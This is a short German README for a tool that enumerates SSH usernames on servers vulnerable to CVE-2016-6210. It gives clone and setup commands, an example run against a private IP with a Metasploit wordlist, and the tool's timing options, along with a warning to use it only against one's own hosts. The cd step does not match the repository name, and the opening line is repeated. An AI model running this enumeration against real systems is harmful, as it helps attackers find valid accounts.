
Benutzernamen-Enumeration gegen SSH-Daemons, die von CVE-2016-6210 betroffen sind.
Benutzernamen-Enumeration gegen SSH-Daemons, die von CVE-2016-6210 betroffen sind.
Nur gegen eigene Hosts verwenden! Das Angreifen von Systemen, für die du keine Berechtigung hast, kann dich in große Schwierigkeiten bringen!
git clone https://github.com/coolbabayaga/CVE-2016-6210.git
cd ssh-enum-cve-2016-6210
python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt
40136.py -h
example: 40136.py -U /usr/share/wordlists/metasploit/unix_users.txt -e -s 192.168.44.63:22
Positionsargumente: host Gibt die SSH-Serveradresse an, z. B. ip:port oder nur die IP
Optionen: -h, --help Zeigt diese Hilfemeldung an und beendet das Programm -u, --user USER Gibt einen einzelnen Benutzernamen an -U, --userlist USERLIST Gibt eine Datei mit einer Benutzerliste an -e, --enumerated Nur enumerierte Benutzer anzeigen -s, --silent Stiller Modus --bytes BYTES Bytes, die als Passwort gesendet werden sollen --samples SAMPLES Stichproben für die Basis-Zeitmessung --factor FACTOR Faktor für die Zeitgrenze --trials TRIALS Versuche pro Benutzer